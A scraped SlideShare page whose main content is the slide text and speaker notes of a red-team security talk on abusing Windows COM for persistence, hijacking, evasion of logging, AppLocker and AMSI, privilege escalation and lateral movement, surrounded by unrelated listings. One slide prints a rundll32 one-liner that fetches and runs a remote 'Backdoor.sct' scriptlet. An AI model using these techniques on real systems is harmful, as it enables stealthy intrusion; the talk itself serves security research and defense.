技術的角色創作工具,旨在透過 Stable Diffusion 模型的圖像生成能力與 Gemini 大模型的故事生成功能,協助使用者輕鬆創作角色。Stable Diffusion 採用擴散式生成模型,能快速生成高解析度、風格多樣且細節豐富的圖像,而 Gemini 大模型則依賴深度學習技術,提供創意性高且語義一致的故事生成功能。使用者只需透過直觀的Tkinter 介面設定角色特徵,如年齡、體型、髮型等,即可自動生成與想像匹配的角色圖像和背景故事。這款工具不僅適合遊戲開發者和小說家,也適用於任何對角色設計有興趣的創作者,為他們提供便利且強大的創作支持。 Intro to Backend Development - GDG on Campus EUE von euegdgoncampus Intro to Backend Development - GDG on Campus EUE Google Developer Group On Campus European Universities in Egypt 18 aufrufe•12 Folien What You'll Learn: - Types of programming languages and how they’re used - The difference between backend and frontend development - Understanding servers and databases - Static vs. dynamic websites A live example of a backend server in action! Understanding How Search Works November 7 2024.pptx von accessinnovations Understanding How Search Works November 7 2024.pptx Access Innovations, Inc. 84 aufrufe•57 Folien With the launches of various LLMs and GPTs over the past two years, we have learned that the size of the collection matters and things we only dreamed of, have become a reality. In the meantime, we have leapfrogged over some of the WHAT about search and the basics that underlie HOW search works haven’t changed since the early 1970s! Understanding How Search Works enables you to make better use what you have in place now and how to implement those much-hyped Gen AI platforms. Join Marjorie M. K. Hlava, Founder and Chief Science Officer at Access Innovations, Inc. for an insightful webinar that will open your eyes and help you make informed decisions about which steps to take next – without a Computer Science degree! BUILD WITH AI GDG on Campus PEC Tiruvallur. von HARISHK755873 BUILD WITH AI GDG on Campus PEC Tiruvallur. HARISHK755873 143 aufrufe•16 Folien Hands on Session STIG 101 with MITRE & Anchore: Insights for Compliance & Cyber Readiness von marketing814989 STIG 101 with MITRE & Anchore: Insights for Compliance & Cyber Readiness Anchore 68 aufrufe•17 Folien The latest FedRAMP revision 5 designates STIGs as the official standard for hardening operating systems and applications that operate inside FedRAMP boundaries, making STIGS the default tool for system integrators, government contractors, and independent software vendors. With this renewed interest in STIGs, it’s a great opportunity to learn STIG terminology and uses. MITRE has been leading the way in modernizing the creation and consumption of STIG guidance for many years now. This includes a tool, Vulcan, to simplify the creation and maintenance of STIG security guidance. In our upcoming live webinar, Aaron Lippold, Chief Architect of MITRE Security Automation Framework (SAF) at MITRE, and Josh Bressers, VP of Security at Anchore, will discuss the rising importance of STIGs. Josh and Aaron will explain how STIGs are used in modern environments, and how you can leverage the new tooling to automate compliance. They will explain and demonstrate how practitioners and security professionals can approach STIG compliance to ensure project success. Attendees will come away with an understanding of: - What is a STIG guide and how to use it - How to approach STIG compliance - Why continuous cyber readiness is critical in today’s landscape - The benefits of real time visibility within the SDLC - How Anchore Enterprise supports STIG compliance ThousandEyes and Webex Assure Seamless Collaboration for Insight Global von ThousandEyes ThousandEyes and Webex Assure Seamless Collaboration for Insight Global ThousandEyes 79 aufrufe•17 Folien Presented by Brian Tobia, Chris Cavendish, and Suzanne Phillips Reshaping the landscape of belonging to transform community von AllThingsOpen Reshaping the landscape of belonging to transform community All Things Open•20 aufrufe ATI PHARMACOLOGY PROCTORED EXAM 20232024.pdf von faithlachero13 ATI PHARMACOLOGY PROCTORED EXAM 20232024.pdf faithlachero13•117 aufrufe Character Generation Master 角色生成大師【艾鍗學院】 von IttrainingIttraining Character Generation Master 角色生成大師【艾鍗學院】 IttrainingIttraining•126 aufrufe Intro to Backend Development - GDG on Campus EUE von euegdgoncampus Intro to Backend Development - GDG on Campus EUE Google Developer Group On Campus European Universities in Egypt•18 aufrufe Understanding How Search Works November 7 2024.pptx von accessinnovations Understanding How Search Works November 7 2024.pptx Access Innovations, Inc. •84 aufrufe BUILD WITH AI GDG on Campus PEC Tiruvallur. von HARISHK755873 BUILD WITH AI GDG on Campus PEC Tiruvallur. HARISHK755873•143 aufrufe STIG 101 with MITRE & Anchore: Insights for Compliance & Cyber Readiness von marketing814989 STIG 101 with MITRE & Anchore: Insights for Compliance & Cyber Readiness Anchore •68 aufrufe ThousandEyes and Webex Assure Seamless Collaboration for Insight Global von ThousandEyes ThousandEyes and Webex Assure Seamless Collaboration for Insight Global ThousandEyes•79 aufrufe GERELATEERDE BOEKEN Kostenlos mit einem 30-tägigen Test von EverandAlle anzeigen BoekThe 1 Page Python BookBarani Kumar ★★☆☆☆2 / 5 BoekThe Windows Command Line Beginner's Guide: Second EditionJonathan Moeller ★★★☆☆3 / 5 BoekPowerShell: A Comprehensive Guide to Windows PowerShellSam Griffin ★★★☆☆3 / 5 BoekUltimate Hacking Challenge: Hacking the Planet, #3sparc Flow ★★★★★5 / 5 BoekC# for Beginners: Learn in 24 HoursAlex Nordeen ☆☆☆☆☆0 / 5 BoekPython Advanced Programming: The Guide to Learn Python Programming. Reference with Exercises and Samples About Dynamical Programming, Multithreading, Multiprocessing, Debugging, Testing and MoreMarcus Richards ☆☆☆☆☆0 / 5 BoekFootprinting, Reconnaissance, Scanning and Enumeration Techniques of Computer NetworksDr. Hidaia Mahmood Alassouli ☆☆☆☆☆0 / 5 BoekBasics with Windows PowershellPrometheus MMS ☆☆☆☆☆0 / 5 GERELATEERDE LUISTERBOEKEN Kostenlos mit einem 30-tägigen Test von EverandAlle anzeigen LuisterboekLinuxRyan Turner ★★★★☆4 / 5 LuisterboekThe Ultimate Kali Linux Book - Second Edition: Perform advanced penetration testing using Nmap, Metasploit, Aircrack-ng, and EmpireGlen D. Singh ★★★★★5 / 5 LuisterboekLearn Python: A Crash Course On Python Programming and How To Start Coding With It. Learn The Basics Of Machine Learning and Data AnalysisDamon Parker ★★★★☆4 / 5 LuisterboekLinux for Beginners: 3 BOOKS IN 1ATTILA KOVACS ★★★★☆4 / 5 LuisterboekThe Blueprint: 3 Books in 1: Python, Hacking & Advanced Hacking: The Blueprint: Everything You Need to Know for Python Programming and Hacking!Cyber Punk Architects ★★★★☆4 / 5 LuisterboekComputer Science 2.0 Beginners Crash Course - Python, Javascript, Cyber Security And Algorithmsian batantu ☆☆☆☆☆0 / 5 LuisterboekThe Ultimate Python Programming Guide from Beginner To IntermediateWilliam Alvin Newton ☆☆☆☆☆0 / 5 LuisterboekPython Computer Programming: Simple Step-By-Step Introduction to the Python Object-Oriented Programming. Quick Start Guide for beginners.Alex Campbell ★★★★★5 / 5 WINDOWS OPERATING SYSTEM ARCHAEOLOGY * 1. Windows Operating System Archaeology Matt Nelson Casey Smith * 2. Who Are We? - Casey Smith (@subTee) - Mandiant Red Team - subt0x10.blogspot.com - Matt Nelson (@enigma0x3) - Operator and Security Researcher at SpecterOps - enigma0x3.net * 3. Objectives For This Talk Foster curiosity & further research Provide references Call attention to the attack surface and capabilities * 4. What Will We Discuss? COM Overview COM Research Methodology Malicious COM Tactics * 5. COM Overview -Brief Background -Registration -Resolution * 6. COM Architecture and History - in 2 minutes ;-) What are COM components? COM components are cross-language classes backed by: DLL (Dynamic-Link Libraries) OCX (ActiveX controls) TLB (Type Libraries ) EXE (Executables) SCT ( XML files ) Location Transparency Principle * 7. Example - COM Scriptlet XML XML Files - We use these for POC examples Registration Block * 8. COM Object Type Registration To find a component when a program needs it, it is USUALLY registered What Registry keys are related to COM object registration? HKLM + HKCU HKCR * 9. What registry entries are needed to register a COM object? https://blogs.msdn.microsoft.com/larryosterman/2006/01/11/what-registry-entries- are-needed-to-register-a-com-object/ Also XRef: Minimal COM object registration https://blogs.msdn.microsoft.com/larryosterman/2006/01/05/minimal-com-object- registration/ * 10. COM Object Type Resolution CLSID - GUID - {AAAA1111-0000-0000-0000-0000FEEDACDC} ProgID - String Monikers - “scriptlet:http://example.com/file.sct” GetObject - CreateObject Methods rundll32.exe javascript:"..mshtml,RunHTMLApplication ";a=GetObject('scriptlet:https://example.com/Backdoor.sct');a.Exec();close(); * 11. WMI GetObject example * 12. Registry Example * 13. COM Registry Keys https://msdn.microsoft.com/en-us/library/windows/desktop/ms678477(v=vs.85).aspx Regsvr32.exe Regasm.exe Regsvcs.exe These tools usually handle the registration and registry key population for us. * 14. Example Call To Create/Locate an Object * 15. What does all this mean? COM Artifacts and details can be found in the registry. Usually... * 16. Avoid Registration Process * 17. Sample Objective: Execute .NET code inside Windows Scripting Host Without registering the COM object. * 18. Registration-Free COM Activation Microsoft.Windows.ActCtx Object Attach a Manifest or Download ManifestURL Loads dll without registration. https://github.com/subTee/RegistrationFreeCOM * 20. RegistrationHelper - Bypass via CScript.exe https://gist.github.com/subTee/631f859c7890316b7e9a880cf4a51500 * 21. Example https://gist.github.com/subTee/631f859c7890316b7e9a880cf4a51500 * 22. In Memory Assembly Execution JScript/VBScript https://github.com/tyranid/DotNetToJScript This is Amazing! Executes a .NET assembly IN JSCRIPT This dramatically extends capabilities of COM Scriptlets No Dll On Disk. Works for .NET 2 and 3.5 Only * 24. Methodology Examples Using Procmon to trace resolution * 25. Example - There are DOZENS of these * 26. Excavation Tools James Forshaw - OleViewDotNet - https://github.com/tyranid/oleviewdotnet Mark Russonovich - ProcMon - https://technet.microsoft.com/en- us/sysinternals/processmonitor RPCView - http://rpcview.org API Spy - http://www.rohitab.com/apimonitor * 27. Malicious Tactics Overview Persistence COM Hijacking - Evasion Office Add-Ins Privilege Escalation Lateral Movement * 28. Persistence via COM Hijacking Leveraging Per-User COM Objects, we can divert resolution to an object under our control. Registry Only Persistence “TreatAs” hijack COM handler hijacking (scheduled tasks) https://msdn.microsoft.com/en-us/library/windows/desktop/ms679737(v=vs.85).aspx https://github.com/subTee/OSArchaeology/blob/master/COM/TreatAsPersistence.reg https://enigma0x3.net/2016/05/25/userland-persistence-with-scheduled-tasks-and- com-handler-hijacking/ * 29. Persistence via COM Hijacking * 30. DEMO Registry Only Persistence * 31. Evasion Windows very often resolves COM objects via the HKCU hive first Find your favorite script that implements GetObject() or CreateObject() and hijack it. This allows you to instantiate your own code without exposing it via the command line. * 32. Abusing WSH: VBScript Injection Leverage an existing, signed VBScript to run our code * 33. C:WindowsSystem32Printing_Admin_Scriptsen-US pubprn.vbs For example: Windows printing script pubprn.vbs calls GetObject on a parameter we control. Can use this to execute a COM scriptlet * 34. Example: Evade Command Line Logging slmgr.vbs instantiates Scripting.Dictionary via CreateObject(). Hijack that object to make it run your code * 35. Source Code of Slmgr.vbs Default System File * 36. Example: Evade Command Line Logging * 37. This is also a clever way to bypass AppLocker ;-) Winrm.vbs * 38. Bypass the AntiMalware Scan Interface (AMSI) * 39. Malicious Office Add-ins Outlook, Excel etc. Rich API for persistence and C2 https://twitter.com/JohnLaTwC/status/836259629277421568 Outlook Rules Added Via COM Object https://gist.github.com/subTee/e04a93260cc69772322502545c2121c4 https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/ * 40. Privilege Escalation The COM Elevation Moniker - Resources -Execute Process in Another user’s session -Think Terminal Server or RDP etc… * 41. COM - CVE-2017-0100 https://drive.google.com/file/d/0B5sMkPVXQnfPbXI0SVliV0tuU0U/view - James Forshaw * 42. Domain Admin Elevation http://blog.inspired-sec.com/archive/2017/03/17/COM-Moniker-Privesc.html @n0pe_sled * 43. Lateral Movement - Leveraging DCOM objects with no explicit access or launch permissions set - Certain objects have interesting methods… https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application- com-object/ https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ * 45. Conclusions * 46. Hopeful outcomes of this talk. Foster curiosity & further research Provide references Call attention to the attack surface and capabilities * 47. Closing Thoughts / Conclusions / Thanks Special Thanks to: David Mcguire & Jason Frank for their support of this research while we were working for them. James Forshaw - For answering our questions and COM research All of the former ATD members who provided feedback and improvements to our research! HINWEIS DER REDAKTION 1. Casey 2. Casey/Matt 3. Casey 4. Casey 5. Casey 6. Casey https://cansecwest.com/slides/2015/Smart_COM_Fuzzing_Auditing_IE_Sandbox_Bypass_in_COM_Objects-Xiaoning_li.pdf https://www.blackhat.com/docs/us-14/materials/us-14-Forshaw-Digging-For_IE11-Sandbox-Escapes.pdf COM Specification: http://www.daimi.au.dk/~datpete/COT/COM_SPEC/pdf/com_spec.pdf Windows COM Dependency/History/Origins James Forshaw’s talk at Troopers and Infiltrate 7. Casey Necessary For GetObject 8. Casey AppID, CLSID Explain HKCR vs hkcu/hklm 9. Casey 10. Casey https://blogs.msdn.microsoft.com/cristib/2012/10/31/how-com-works-how-to-build-a-com-visible-dll-in-c-net-call-it-from-vba-and-select-the-proper-classinterface-autodispatch-autodual-part12/ Be sure to reference script:http for Matt’s malicious demos 11. Casey Importance Of GetObject 12. Casey 13. Casey From COM Specification 14. Casey 15. Casey 16. Casey 17. Casey 18. Casey (maybe add arrows) 19. Casey 20. Matt Resolution fails as well 21. Matt (reference treatas) 22. Casey/Matt 23. Matt 24. Matt http://www.nobunkum.ru/analytics/en-com-hijacking https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence https://attack.mitre.org/wiki/Technique/T1122 25. Matt 26. Matt 27. Matt 28. Matt 29. Matt Source Code of pubprn.vbs Injectable args(1) 30. Matt 31. Matt Point out why that injection is possible. We can hijack the script at CreateObject - before the rest of the logic! 32. Matt 33. Matt 34. Matt 35. Matt 36. Casey https://msdn.microsoft.com/en-us/library/ms679687.aspx - COM Elevation Moniker https://bugs.chromium.org/p/project-zero/issues/detail?id=1021&can=1&q=&sort=-id%20-%20P0%20EoP Reference Julian n0pe_sleds write up once posted on using this trick to get DA. http://blog.inspired-sec.com/archive/2017/03/17/COM-Moniker-Privesc.html 37. Casey https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=262285 http://blog.inspired-sec.com/archive/2017/03/17/COM-Moniker-Privesc.html Windows HelpPane Elevation of Privilege Vulnerability - CVE-2017-0100An elevation of privilege exists in Windows when a DCOM object in Helppane.exe configured to run as the interactive user fails to properly authenticate the client. An attacker who successfully exploited the vulnerability could run arbitrary code in another user's session.To exploit the vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability once another user logged in to the same system via Terminal Services or Fast User Switching.The update addresses the vulnerability by correcting how Helppane.exe authenticates the client.The following table contains links to the standard entry for each vulnerability in the Common Vulnerabilities and Exposures list:Vulnerability titleCVE numberPublicly disclosedExploitedWindows HelpPane Elevation of Privilege VulnerabilityCVE-2017-0100NoNo 38. Casey 39. Matt 40. Matt 41. Matt Inhalt melden Herunterladen 15 GEFÄLLT MIR Mehr anzeigen AUFRUFE Aufrufe insgesamt13.988 Auf Slideshare0 Aus Einbettungen0 Anzahl der Einbettungen0 DIESER GESPEICHERTE EINTRAG IST AUCH IN EINER LISTE. Das Entfernen aus „Gespeichert“ löscht den Titel auch aus Ihren Listen. AbbrechenLöschen ZU EINER NEUEN LISTE HINZUFÜGEN Wie möchten Sie diese Liste nennen?* *erforderlich0/50 Liste privat machen AbbrechenSpeichern InfoSupportAGBPrivacyDatenschutzCookie-EinstellungenMeine persönlichen Daten nicht verkaufen oder weitergebenEverand DeutscheAktuelle Sprache -------------------------------------------------------------------------------- © 2024 SlideShare von Scribd